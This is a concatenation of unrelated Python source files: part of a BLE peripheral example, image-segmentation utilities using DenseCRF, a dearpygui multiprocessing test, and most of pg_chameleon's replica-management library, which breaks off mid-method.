# Send out a notification of this new value
waitable = self.characteristic.notify(value)
# Send a burst of 16, then wait for them all to send before trying to send more
if self.current_value % 16 == 0:
waitable.wait()
time.sleep(1) # Wait a second before sending out the next burst
except Exception as e:
logger.exception(e)
self._stopped.set()
def main(serial_port):
# Create and open the device
ble_device = BleDevice(serial_port)
ble_device.open()
# Set up desired security parameters
ble_device.client.security.set_security_params(passcode_pairing=False, bond=False,
io_capabilities=IoCapabilities.DISPLAY_ONLY, out_of_band=False)
ble_device.client.security.on_pairing_complete.register(on_client_pairing_complete)
ble_device.client.security.on_passkey_display_required.register(on_passkey_display)
# Create and add the math service
service = ble_device.database.add_service(constants.MATH_SERVICE_UUID)
# Create and add the hex conversion characteristic to the service
hex_conv_char = service.add_characteristic(constants.HEX_CONVERT_CHAR_UUID,
constants.HEX_CONVERT_CHAR_PROPERTIES, "Test Data")
# Register the callback for when a write occurs and subscription state changes
hex_conv_char.on_write.register(on_hex_conversion_characteristic_write)
hex_conv_char.on_subscription_change.register(on_gatts_subscription_state_changed)
# Create and add the counting characteristic, initializing the data to [0, 0, 0, 0]
counting_char = service.add_characteristic(constants.COUNTING_CHAR_UUID, constants.COUNTING_CHAR_PROPERTIES, [0]*4)
counting_char.on_subscription_change.register(on_gatts_subscription_state_changed)
# Create the thread for the counting characteristic
counting_char_thread = CountingCharacteristicThread(counting_char)
# Create and add the time service
time_service = ble_device.database.add_service(constants.TIME_SERVICE_UUID)
# Add the time characteristic and register the callback for when its read
time_char = time_service.add_characteristic(constants.TIME_CHAR_UUID, constants.TIME_CHAR_PROPERTIES, "Time")
time_char.on_read.register(on_time_char_read)
# Initialize the advertising and scan response data
adv_data = advertising.AdvertisingData(local_name=constants.PERIPHERAL_NAME, flags=0x06)
scan_data = advertising.AdvertisingData(service_uuid128s=constants.TIME_SERVICE_UUID, has_more_uuid128_services=True)
ble_device.advertiser.set_advertise_data(adv_data, scan_data)
# Start advertising
logger.info("Advertising")
ble_device.client.on_connect.register(on_connect)
ble_device.client.on_disconnect.register(on_disconnect)
ble_device.advertiser.start(timeout_sec=0, auto_restart=True)
# Create a waitable that will never fire, and wait for some time
w = GenericWaitable()
w.wait(60*30, exception_on_timeout=False) # Keep device active for 30 mins
# Cleanup
counting_char_thread.join()
logger.info("Done")
ble_device.close()
if __name__ == '__main__':
main("COM49")
|
utils_test.py
|
import cv2
from queue import Queue
from threading import Thread
import os
from config import imshape
import json
import numpy as np
from config import hues, labels, imshape, mode
import pydensecrf.densecrf as dcrf
from pydensecrf.utils import unary_from_softmax
from tensorflow.keras.utils import to_categorical
class VideoStream:
# self.queue = Queue(maxsize=size)
def get_frame(self):
return cv2.imread('./images/1.png')
#self.stream.set(cv2.CAP_PROP_FPS, 10)
# self.stopped = False
# self.queue = Queue(maxsize=size)
#def start(self):
# thread = Thread(target=self.update, args=())
# thread.daemon = True
# thread.start()
# return self
#def update(self):
# while self.stopped is False:
# if not self.queue.full():
# (grabbed, frame) = self.stream.read()
# if not grabbed:
# self.stop()
# return
# self.queue.put(frame)
#def read(self):
# return self.queue.get()
#def check_queue(self):
# return self.queue.qsize() > 0
#def stop(self):
# self.stopped = True
# self.stream.release()
def generate_missing_json():
# creates a background json for the entire image if missing
# this assumes you will never annotate a background class
for im in os.listdir('images'):
fn = im.split('.')[0]+'.json'
path = os.path.join('annotated', fn)
if os.path.exists(path) is False:
json_dict = {}
# these points might be reversed if not using a square image (idk)
json_dict['shapes'] = [{"label": "background",
"points": [[0,0],
[0, imshape[0]-1],
[imshape[0]-1, imshape[1]-1],
[imshape[0]-1, 0]]
}]
with open(path, 'w') as handle:
json.dump(json_dict, handle, indent=2)
#def add_masks(pred):
# blank = np.zeros(shape=imshape, dtype=np.uint8)
# for i, label in enumerate(labels):
# hue = np.full(shape=(imshape[0], imshape[1]), fill_value=hues[label], dtype=np.uint8)
# sat = np.full(shape=(imshape[0], imshape[1]), fill_value=255, dtype=np.uint8)
# val = pred[:,:,i].astype(np.uint8)
# im_hsv = cv2.merge([hue, sat, val])
# im_rgb = cv2.cvtColor(im_hsv, cv2.COLOR_HSV2RGB)
# blank = cv2.add(blank, im_rgb)
#
# return blank
def add_masks(pred):
blank = np.zeros(shape=imshape, dtype=np.uint8)
for i, label in enumerate(labels):
hue = np.full(shape=(imshape[0], imshape[1]), fill_value=hues[label], dtype=np.uint8)
sat = np.full(shape=(imshape[0], imshape[1]), fill_value=255, dtype=np.uint8)
val = pred[:,:,i].astype(np.uint8)
im_hsv = cv2.merge([hue, sat, val])
im_rgb = cv2.cvtColor(im_hsv, cv2.COLOR_HSV2RGB)
blank = cv2.add(blank, im_rgb)
return blank
def crf(im_softmax, im_rgb):
n_classes = im_softmax.shape[2]
feat_first = im_softmax.transpose((2, 0, 1)).reshape(n_classes, -1)
unary = unary_from_softmax(feat_first)
unary = np.ascontiguousarray(unary)
im_rgb = np.ascontiguousarray(im_rgb)
d = dcrf.DenseCRF2D(im_rgb.shape[1], im_rgb.shape[0], n_classes)
d.setUnaryEnergy(unary)
d.addPairwiseGaussian(sxy=(5, 5), compat=3, kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This adds the color-dependent term, i.e. features are (x,y,r,g,b).
d.addPairwiseBilateral(sxy=(5, 5), srgb=(13, 13, 13), rgbim=im_rgb,
compat=10,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
Q = d.inference(5)
res = np.argmax(Q, axis=0).reshape((im_rgb.shape[0], im_rgb.shape[1]))
if mode == 'binary':
return res * 255.0
if mode == 'multi':
res_hot = to_categorical(res) * 255.0
res_crf = add_masks(res_hot)
return res_crf
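# Minimal usage sketch (assumed shapes): given per-pixel class probabilities
# im_softmax of shape (H, W, n_classes) and the matching RGB frame im_rgb,
#   refined = crf(im_softmax, im_rgb)
# returns a binary mask or the recoloured multi-class mask depending on `mode`.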
|
multi.py
|
import dearpygui.core as core
import time
import multiprocessing
def t1():
core.set_vsync(True)
core.add_window("##base", no_background=True)
core.start_dearpygui(primary_window="##base")
def t2():
core.set_vsync(True)
core.add_window("##base")
core.start_dearpygui(primary_window="##base")
if __name__ == "__main__":
multiprocessing.Process(target=t1).start()
# multiprocessing.Process(target=t2).start()
t2()
|
global_lib.py
|
import rollbar
import pprint
import yaml
import os, os.path
import sys
import time
import signal
from shutil import copy
from distutils.sysconfig import get_python_lib
from tabulate import tabulate
from pg_chameleon import pg_engine, mysql_source, pgsql_source
import logging
from logging.handlers import TimedRotatingFileHandler
from daemonize import Daemonize
import multiprocessing as mp
import traceback
class rollbar_notifier(object):
"""
This class is used to send messages to rollbar when the key and environment variables are set
"""
def __init__(self, rollbar_key, rollbar_env, rollbar_level, logger):
"""
Class constructor.
"""
self.levels = {
"critical": 1,
"error": 2,
"warning": 3,
"info": 5
}
self.rollbar_level = self.levels[rollbar_level]
self.logger = logger
self.notifier = rollbar
if rollbar_key !='' and rollbar_env != '':
self.notifier.init(rollbar_key, rollbar_env)
else:
self.notifier = None
def send_message(self, message, level):
"""
The method sends a message to rollbar. If it fails it just logs an error
without causing the process to crash.
"""
if self.notifier:
exc_info = sys.exc_info()
try:
notification_level = self.levels[level]
if notification_level <= self.rollbar_level:
try:
self.notifier.report_message(message, level)
if exc_info[0]:
self.notifier.report_exc_info(exc_info)
except:
self.logger.error("Could not send the message to rollbar.")
except:
self.logger.error("Wrong rollbar level specified.")
class replica_engine(object):
"""
This class wraps the mysql and postgresql engines in order to perform the various activities required for the replica.
The constructor inits the global configuration class and sets up the mysql and postgresql engines as class objects.
The class sets up the logging using the configuration parameters.
"""
def __init__(self, args):
"""
Class constructor.
"""
if os.geteuid()==0:
print ("pg_chameleon cannot be run as root")
sys.exit(10)
self.catalog_version = '2.0.7'
self.upgradable_version = '1.7'
self.lst_yes= ['yes', 'Yes', 'y', 'Y']
python_lib=os.path.dirname(os.path.realpath(__file__))
cham_dir = "%s/.pg_chameleon" % os.path.expanduser('~')
local_conf = "%s/configuration/" % cham_dir
self.global_conf_example = '%s/../configuration/config-example.yml' % python_lib
self.local_conf_example = '%s/config-example.yml' % local_conf
local_logs = "%s/logs/" % cham_dir
local_pid = "%s/pid/" % cham_dir
self.conf_dirs=[
cham_dir,
local_conf,
local_logs,
local_pid,
]
self.args = args
self.source = self.args.source
if self.args.command == 'set_configuration_files':
self.set_configuration_files()
sys.exit()
self.__set_conf_permissions(cham_dir)
self.load_config()
log_list = self.__init_logger("global")
self.logger = log_list[0]
self.logger_fds = log_list[1]
#notifier configuration
self.notifier = rollbar_notifier(self.config["rollbar_key"],self.config["rollbar_env"] , self.args.rollbar_level , self.logger )
#pg_engine instance initialisation
self.pg_engine = pg_engine()
self.pg_engine.dest_conn = self.config["pg_conn"]
self.pg_engine.logger = self.logger
self.pg_engine.source = self.args.source
self.pg_engine.full = self.args.full
self.pg_engine.type_override = self.config["type_override"]
self.pg_engine.sources = self.config["sources"]
self.pg_engine.notifier = self.notifier
try:
self.pg_engine.migrate_default_value = self.config["sources"][self.source]["migrate_default_value"]
except KeyError:
self.pg_engine.migrate_default_value = True
#mysql_source instance initialisation
self.mysql_source = mysql_source()
self.mysql_source.source = self.args.source
self.mysql_source.tables = self.args.tables
self.mysql_source.schema = self.args.schema.strip()
self.mysql_source.pg_engine = self.pg_engine
self.mysql_source.logger = self.logger
self.mysql_source.sources = self.config["sources"]
self.mysql_source.type_override = self.config["type_override"]
self.mysql_source.notifier = self.notifier
#pgsql_source instance initialisation
self.pgsql_source = pgsql_source()
self.pgsql_source.source = self.args.source
self.pgsql_source.tables = self.args.tables
self.pgsql_source.schema = self.args.schema.strip()
self.pgsql_source.pg_engine = self.pg_engine
self.pgsql_source.logger = self.logger
self.pgsql_source.sources = self.config["sources"]
self.pgsql_source.type_override = self.config["type_override"]
self.pgsql_source.notifier = self.notifier
catalog_version = self.pg_engine.get_catalog_version()
#safety checks
if self.args.command == 'upgrade_replica_schema':
self.pg_engine.sources = self.config["sources"]
print("WARNING, entering upgrade mode. Disabling the catalogue version's check. Expected version %s, installed version %s" % (self.catalog_version, catalog_version))
elif self.args.command == 'enable_replica' and self.catalog_version != catalog_version:
print("WARNING, catalogue mismatch. Expected version %s, installed version %s" % (self.catalog_version, catalog_version))
else:
if catalog_version:
if self.catalog_version != catalog_version:
print("FATAL, replica catalogue version mismatch. Expected %s, got %s" % (self.catalog_version, catalog_version))
sys.exit()
if self.args.source != '*' and self.args.command != 'add_source':
self.pg_engine.connect_db()
source_count = self.pg_engine.check_source()
self.pg_engine.disconnect_db()
if source_count == 0:
print("FATAL, The source %s is not registered. Please add it add_source" % (self.args.source))
sys.exit()
def terminate_replica(self, signal, frame):
"""
Stops gracefully the replica.
"""
self.logger.info("Caught stop replica signal terminating daemons and ending the replica process.")
self.read_daemon.terminate()
self.replay_daemon.terminate()
self.pg_engine.connect_db()
self.pg_engine.set_source_status("stopped")
sys.exit(0)
def set_configuration_files(self):
"""
The method loops over the list self.conf_dirs, creating the directories only if they are missing.
The method checks the freshness of the config-example.yml and connection-example.yml files and
copies the new version from the python library path determined in the class constructor with get_python_lib().
If the configuration file is missing the method copies the file with a different message.
"""
for confdir in self.conf_dirs:
if not os.path.isdir(confdir):
print ("creating directory %s" % confdir)
os.mkdir(confdir)
if os.path.isfile(self.local_conf_example):
print ("updating configuration example with %s" % self.local_conf_example)
else:
print ("copying configuration example in %s" % self.local_conf_example)
copy(self.global_conf_example, self.local_conf_example)
def load_config(self):
"""
The method loads the configuration from the file specified in the args.config parameter.
"""
local_confdir = "%s/.pg_chameleon/configuration/" % os.path.expanduser('~')
self.config_file = '%s/%s.yml'%(local_confdir, self.args.config)
if not os.path.isfile(self.config_file):
print("**FATAL - configuration file missing. Please ensure the file %s is present." % (self.config_file))
sys.exit()
config_file = open(self.config_file, 'r')
self.config = yaml.load(config_file.read(), Loader=yaml.FullLoader)
config_file.close()
def show_sources(self):
"""
The method shows the sources available in the configuration file.
"""
for item in self.config["sources"]:
print("\n")
print (tabulate([], headers=["Source %s" % item]))
tab_headers = ['Parameter', 'Value']
tab_body = []
source = self.config["sources"][item]
config_list = [param for param in source if param not in ['db_conn']]
connection_list = [param for param in source["db_conn"] if param not in ['password']]
for parameter in config_list:
tab_row = [parameter, source[parameter]]
tab_body.append(tab_row)
for param in connection_list:
tab_row = [param, source["db_conn"][param]]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers))
def show_config(self):
"""
The method loads the current configuration and displays the status in tabular output
"""
config_list = [item for item in self.config if item not in ['pg_conn', 'sources', 'type_override']]
connection_list = [item for item in self.config["pg_conn"] if item not in ['password']]
type_override = pprint.pformat(self.config['type_override'], width = 20)
tab_body = []
tab_headers = ['Parameter', 'Value']
for item in config_list:
tab_row = [item, self.config[item]]
tab_body.append(tab_row)
for item in connection_list:
tab_row = [item, self.config["pg_conn"][item]]
tab_body.append(tab_row)
tab_row = ['type_override', type_override]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers))
self.show_sources()
def create_replica_schema(self):
"""
The method creates the replica schema in the destination database.
"""
self.logger.info("Trying to create replica schema")
self.pg_engine.create_replica_schema()
def drop_replica_schema(self):
"""
The method removes the replica schema from the destination database.
"""
self.logger.info("Dropping the replica schema")
self.pg_engine.drop_replica_schema()
def add_source(self):
"""
The method adds a new replication source. A pre-existence check is performed.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
self.logger.info("Trying to add a new source")
self.pg_engine.add_source()
def drop_source(self):
"""
The method removes a replication source from the catalogue.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
drp_msg = 'Dropping the source %s will drop any replica reference.\n Are you sure? YES/No\n' % self.args.source
drop_src = input(drp_msg)
if drop_src == 'YES':
self.logger.info("Trying to remove the source")
self.pg_engine.drop_source()
elif drop_src in self.lst_yes:
print('Please type YES all uppercase to confirm')
def enable_replica(self):
"""
The method resets the source status to stopped and disables any leftover maintenance mode
"""
self.pg_engine.connect_db()
self.pg_engine.set_source_status("stopped")
self.pg_engine.end_maintenance()
def init_replica(self):
"""
The method initialises a replica for a given source and configuration.
It is compulsory to specify a source name when running this method.
The method checks the source type and calls the corresponding initialisation method.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
elif self.args.tables != "*":
print("You cannot specify a table name when running init_replica.")
else:
try:
source_type = self.config["sources"][self.args.source]["type"]
except KeyError:
print("The source %s doesn't exists." % (self.args.source))
sys.exit()
self.__stop_replica()
if source_type == "mysql":
self.__init_mysql_replica()
elif source_type == "pgsql":
self.__init_pgsql_replica()
def __init_mysql_replica(self):
"""
The method initialises a replica for a given mysql source within the specified configuration.
The method is called by the public method init_replica.
"""
if self.args.debug:
self.mysql_source.init_replica()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Init replica process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("Initialising the replica for source %s" % self.args.source)
init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.mysql_source.init_replica, foreground=foreground , keep_fds=keep_fds)
init_daemon.start()
def __init_pgsql_replica(self):
"""
The method initialises a replica for a given postgresql source within the specified configuration.
The method is called by the public method init_replica.
"""
if self.args.debug:
self.pgsql_source.init_replica()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Init replica process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("Initialising the replica for source %s" % self.args.source)
init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.pgsql_source.init_replica, foreground=foreground , keep_fds=keep_fds)
init_daemon.start()
def refresh_schema(self):
"""
The method reloads the data from a source, only for a specified schema.
It is compulsory to specify a source name and an origin's schema name.
The schema mappings are honoured by the procedure automatically.
"""
if self.args.source == "*":
print("You must specify a source name using the argument --source")
elif self.args.schema == "*":
print("You must specify an origin's schema name using the argument --schema")
else:
self.__stop_replica()
if self.args.debug:
self.mysql_source.refresh_schema()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Sync tables process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source))
sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.refresh_schema, foreground=foreground , keep_fds=keep_fds)
                sync_daemon.start()
def sync_tables(self):
"""
            The method reloads the data from a source, but only for the specified tables.
            It is compulsory to specify a source name and at least one table name when running this method.
            Multiple tables are allowed if comma separated.
"""
if self.args.source == "*":
print("You must specify a source name using the argument --source")
elif self.args.tables == "*":
print("You must specify one or more tables, in the form schema.table, separated by comma using the argument --tables")
else:
self.__stop_replica()
if self.args.debug:
self.mysql_source.sync_tables()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Sync tables process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source))
sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.sync_tables, foreground=foreground , keep_fds=keep_fds)
                sync_daemon.start()
def __stop_all_active_sources(self):
"""
The method stops all the active sources within the target PostgreSQL database.
"""
active_source = self.pg_engine.get_active_sources()
for source in active_source:
self.source = source[0]
self.__stop_replica()
def upgrade_replica_schema(self):
"""
            The method upgrades an existing replica catalogue to the newer version.
            If the catalogue is at the upgradable previous version the user is asked to confirm the upgrade;
            a version 2.0 catalogue is upgraded after stopping all the active sources first.
"""
catalog_version = self.pg_engine.get_catalog_version()
if catalog_version == self.catalog_version:
print("The replica catalogue is already up to date.")
sys.exit()
else:
if catalog_version == self.upgradable_version:
upg_msg = 'Upgrading the catalogue %s to the version %s.\n Are you sure? YES/No\n' % (catalog_version, self.catalog_version)
upg_cat = input(upg_msg)
if upg_cat == 'YES':
self.logger.info("Performing the upgrade")
self.pg_engine.upgrade_catalogue_v1()
elif upg_cat in self.lst_yes:
print('Please type YES all uppercase to confirm')
elif catalog_version.split('.')[0] == '2' and catalog_version.split('.')[1] == '0':
print('Stopping all the active sources.')
self.__stop_all_active_sources()
print('Upgrading the replica catalogue. ')
self.pg_engine.upgrade_catalogue_v20()
else:
                print('Wrong starting version. Expected %s, got %s' % (self.upgradable_version, catalog_version))
sys.exit()
def update_schema_mappings(self):
"""
The method updates the schema mappings for the given source.
            The schema mappings are a configuration parameter but are stored in the replica
            catalogue when the source is added. If any change is made to the configuration file this method
            should be called to update the system catalogue as well. The pg_engine method checks for any conflict before running
            the update on the tables t_sources and t_replica_tables.
            It is compulsory to specify a source name when running this method.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
self.__stop_replica()
self.pg_engine.update_schema_mappings()
def read_replica(self, queue, log_read):
"""
The method reads the replica stream for the given source and stores the row images
in the target postgresql database.
"""
if "keep_existing_schema" in self.config["sources"][self.args.source]:
keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"]
else:
keep_existing_schema = False
self.mysql_source.keep_existing_schema = keep_existing_schema
self.mysql_source.logger = log_read[0]
self.pg_engine.logger = log_read[0]
while True:
try:
self.mysql_source.read_replica()
time.sleep(self.sleep_loop)
except Exception:
queue.put(traceback.format_exc())
break
def replay_replica(self, queue, log_replay):
"""
The method replays the row images stored in the target postgresql database.
"""
self.pg_engine.logger = log_replay[0]
tables_error = []
self.pg_engine.connect_db()
self.pg_engine.set_source_id()
while True:
try:
tables_error = self.pg_engine.replay_replica()
if len(tables_error) > 0:
table_list = [item for sublist in tables_error for item in sublist]
tables_removed = "\n".join(table_list)
notifier_message = "There was an error during the replay of data. %s. The affected tables are no longer replicated." % (tables_removed)
self.logger.error(notifier_message)
self.notifier.send_message(notifier_message, 'error')
except Exception:
queue.put(traceback.format_exc())
break
time.sleep(self.sleep_loop)
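    # Descriptive note on error handling: read_replica and replay_replica run in separate
    # processes and never let an exception escape; the traceback is pushed onto the shared
    # multiprocessing queue so the parent loop in __run_replica can log it and notify.
    # A minimal sketch of the pattern, with hypothetical names:
    #
    #   try:
    #       do_work()
    #   except Exception:
    #       queue.put(traceback.format_exc())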
def __run_replica(self):
"""
            The method manages the two separate read and replay processes using the multiprocessing library.
            It can be daemonised or run in the foreground according to the --debug switch or the log
            destination.
"""
if "auto_maintenance" not in self.config["sources"][self.args.source]:
auto_maintenance = "disabled"
else:
auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"]
if "gtid_enable" not in self.config["sources"][self.args.source]:
gtid_enable = False
else:
gtid_enable = self.config["sources"][self.args.source]["gtid_enable"]
self.mysql_source.gtid_enable = gtid_enable
log_read = self.__init_logger("read")
log_replay = self.__init_logger("replay")
signal.signal(signal.SIGINT, self.terminate_replica)
queue = mp.Queue()
self.sleep_loop = self.config["sources"][self.args.source]["sleep_loop"]
if self.args.debug:
check_timeout = self.sleep_loop
else:
check_timeout = self.sleep_loop*10
self.logger.info("Starting the replica daemons for source %s " % (self.args.source))
self.read_daemon = mp.Process(target=self.read_replica, name='read_replica', daemon=True, args=(queue, log_read,))
self.replay_daemon = mp.Process(target=self.replay_replica, name='replay_replica', daemon=True, args=(queue, log_replay,))
self.read_daemon.start()
self.replay_daemon.start()
while True:
read_alive = self.read_daemon.is_alive()
replay_alive = self.replay_daemon.is_alive()
if read_alive and replay_alive:
self.logger.debug("Replica process for source %s is running" % (self.args.source))
self.pg_engine.cleanup_replayed_batches()
else:
stack_trace = queue.get()
self.logger.error("Read process alive: %s - Replay process alive: %s" % (read_alive, replay_alive, ))
self.logger.error("Stack trace: %s" % (stack_trace, ))
if read_alive:
self.read_daemon.terminate()
self.logger.error("Replay daemon crashed. Terminating the read daemon.")
if replay_alive:
self.replay_daemon.terminate()
self.logger.error("Read daemon crashed. Terminating the replay daemon.")
if self.args.debug:
replica_status = "stopped"
else:
replica_status = "error"
try:
self.pg_engine.connect_db()
self.pg_engine.set_source_status(replica_status)
except:
pass
notifier_message = "The replica process crashed.\n Source: %s\n Stack trace: %s " %(self.args.source, stack_trace)
self.notifier.send_message(notifier_message, 'critical')
break
time.sleep(check_timeout)
if auto_maintenance != "disabled":
self.pg_engine.auto_maintenance = auto_maintenance
self.pg_engine.connect_db()
run_maintenance = self.pg_engine.check_auto_maintenance()
self.pg_engine.disconnect_db()
if run_maintenance:
self.pg_engine.run_maintenance()
self.logger.info("Replica process for source %s ended" % (self.args.source))
def start_replica(self):
"""
The method starts a new replica process.
            It is compulsory to specify a source name when running this method.
"""
replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
if self.args.source == "*":
print("You must specify a source name using the argument --source")
else:
self.pg_engine.connect_db()
self.logger.info("Checking if the replica for source %s is stopped " % (self.args.source))
replica_status = self.pg_engine.get_replica_status()
if replica_status in ['syncing', 'running', 'initialising']:
print("The replica process is already started or is syncing. Aborting the command.")
elif replica_status == 'error':
print("The replica process is in error state.")
print("You may need to check the replica status first. To enable it run the following command.")
print("chameleon.py enable_replica --config %s --source %s " % (self.args.config, self.args.source))
else:
self.logger.info("Cleaning not processed batches for source %s" % (self.args.source))
self.pg_engine.clean_not_processed_batches()
self.pg_engine.disconnect_db()
if self.args.debug:
self.__run_replica()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Starting the replica process for source %s" % (self.args.source))
keep_fds = [self.logger_fds]
app_name = "%s_replica" % self.args.source
replica_daemon = Daemonize(app=app_name, pid=replica_pid, action=self.__run_replica, foreground=foreground , keep_fds=keep_fds)
try:
replica_daemon.start()
except:
print("The replica process is already started. Aborting the command.")
def __stop_replica(self):
"""
The method reads the pid of the replica process for the given self.source and sends a SIGINT which
tells the replica process to manage a graceful exit.
"""
replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.source))
if os.path.isfile(replica_pid):
try:
file_pid=open(replica_pid,'r')
pid=file_pid.read()
file_pid.close()
os.kill(int(pid),2)
print("Requesting the replica for source %s to stop" % (self.source))
while True:
try:
os.kill(int(pid),0)
except:
break
print("The replica process is stopped")
except:
print("An error occurred when trying to signal the replica process")
def __set_conf_permissions(self, cham_dir):
"""
The method sets the permissions of the configuration directory to 700
:param cham_dir: the chameleon configuration directory to fix
"""
if os.path.isdir(cham_dir):
os.chmod(cham_dir, 0o700)
def stop_replica(self):
"""
The method calls the private method __stop_replica to stop the replica process.
"""
self.__stop_replica()
def stop_all_replicas(self):
"""
The method stops all the active replicas within the target database
"""
self.__stop_all_active_sources()
def show_errors(self):
"""
            Displays the error log entries, if any.
            If a source is specified the error log is filtered for that source only.
"""
log_id = self.args.logid
self.pg_engine.source = self.args.source
log_error_data = self.pg_engine.get_log_data(log_id)
if log_error_data:
if log_id != "*":
tab_body = []
log_line = log_error_data[0]
tab_body.append(['Log id', log_line[0]])
tab_body.append(['Source name', log_line[1]])
tab_body.append(['ID Batch', log_line[2]])
tab_body.append(['Table', log_line[3]])
tab_body.append(['Schema', log_line[4]])
tab_body.append(['Error timestamp', log_line[5]])
tab_body.append(['SQL executed', log_line[6]])
tab_body.append(['Error message', log_line[7]])
print(tabulate(tab_body, tablefmt="simple"))
else:
tab_headers = ['Log id', 'Source name', 'ID Batch', 'Table', 'Schema' , 'Error timestamp']
tab_body = []
for log_line in log_error_data:
log_id = log_line[0]
id_batch = log_line[1]
source_name = log_line[2]
table_name = log_line[3]
schema_name = log_line[4]
error_timestamp = log_line[5]
tab_row = [log_id, id_batch,source_name, table_name, schema_name, error_timestamp]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers, tablefmt="simple"))
else:
print('There are no errors in the log')
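    # The error views above are rendered with python-tabulate; a minimal usage sketch
    # with made-up rows (hypothetical data, shown only to illustrate the layout):
    #
    #   from tabulate import tabulate
    #   print(tabulate([[1, 'mysql_src', 'my_table']],
    #                  headers=['Log id', 'Source name', 'Table'], tablefmt='simple'))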
def show_status(self):
"""
            Lists the replica status from the replica catalogue.
            If a source is specified the method displays some extra details on the source status.
"""
self.pg_engine.auto_maintenance = "disabled"
if self.args.source != "*":
if "auto_maintenance" in self.config["sources"][self.args.source]:
self.pg_engine.auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"]
self.pg_engine.source = self.args.source
configuration_data = self.pg_engine.get_status()
configuration_status = configuration_data[0]
schema_mappings = configuration_data[1]
table_status = configuration_data[2]
replica_counters = configuration_data[3]
tab_headers = ['Source id', 'Source name', 'Type', 'Status', 'Consistent' , 'Read lag', 'Last read', 'Replay lag' , 'Last replay']
tab_body = []
for status in configuration_status:
source_id = status[0]
source_name = status[1]
source_status = status[2]
read_lag = status[3]
last_read = status[4]
replay_lag = status[5]
last_replay = status[6]
consistent = status[7]
source_type = status[8]
last_maintenance = status[9]
next_maintenance = status[10]
tab_row = [source_id, source_name, source_type, source_status, consistent, read_lag, last_read, replay_lag, last_replay]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers, tablefmt="simple"))
if schema_mappings:
print('\n== Schema mappings ==')
tab_headers = ['Origin schema', 'Destination schema']
tab_body = []
for mapping in schema_mappings:
origin_schema = mapping[0]
destination_schema= mapping[1]
tab_row = [origin_schema, destination_schema]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers, tablefmt="simple"))
if table_status:
print('\n== Replica status ==')
#tab_headers = ['', '', '']
tab_body = []
tables_no_replica = table_status[0]
tab_row = ['Tables not replicated', tables_no_replica[1]]
tab_body.append(tab_row)
tables_with_replica = table_status[1]
tab_row = ['Tables replicated', tables_with_replica[1]]
tab_body.append(tab_row)
tables_all= table_status[2]
tab_row = ['All tables', tables_all[1]]
tab_body.append(tab_row)
tab_row = ['Last maintenance', last_maintenance]
tab_body.append(tab_row)
tab_row = ['Next maintenance', next_maintenance]
tab_body.append(tab_row)
if replica_counters:
tab_row = ['Replayed rows', replica_counters[0]]
tab_body.append(tab_row)
tab_row = ['Replayed DDL', replica_counters[2]]
tab_body.append(tab_row)
tab_row = ['Skipped rows', replica_counters[1]]
tab_body.append(tab_row)
print(tabulate(tab_body, tablefmt="simple"))
if tables_no_replica[2]:
print('\n== Tables with replica disabled ==')
print("\n".join(tables_no_replica[2]))
def detach_replica(self):
"""
The method terminates the replica process. The source is removed from the table t_sources with all the associated data.
            The schema sequences are reset to the max values in the corresponding tables, leaving
            the postgresql database as a standalone snapshot.
            The method creates the foreign keys existing in MySQL as well.
            It is compulsory to specify a source name when running this method.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
elif self.args.tables != "*":
print("You cannot specify a table name when running detach_replica.")
else:
drp_msg = 'Detaching the replica will remove any reference for the source %s.\n Are you sure? YES/No\n' % self.args.source
drop_src = input(drp_msg)
if drop_src == 'YES':
if "keep_existing_schema" in self.config["sources"][self.args.source]:
keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"]
else:
keep_existing_schema = False
self.pg_engine.keep_existing_schema = keep_existing_schema
if not keep_existing_schema:
self.pg_engine.fk_metadata = self.mysql_source.get_foreign_keys_metadata()
self.__stop_replica()
self.pg_engine.detach_replica()
elif drop_src in self.lst_yes:
print('Please type YES all uppercase to confirm')
def run_maintenance(self):
"""
The method runs a maintenance process on the target postgresql database specified in the given source.
"""
maintenance_pid = os.path.expanduser('%s/%s_maintenance.pid' % (self.config["pid_dir"],self.args.source))
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
if self.args.debug:
self.pg_engine.run_maintenance()
else:
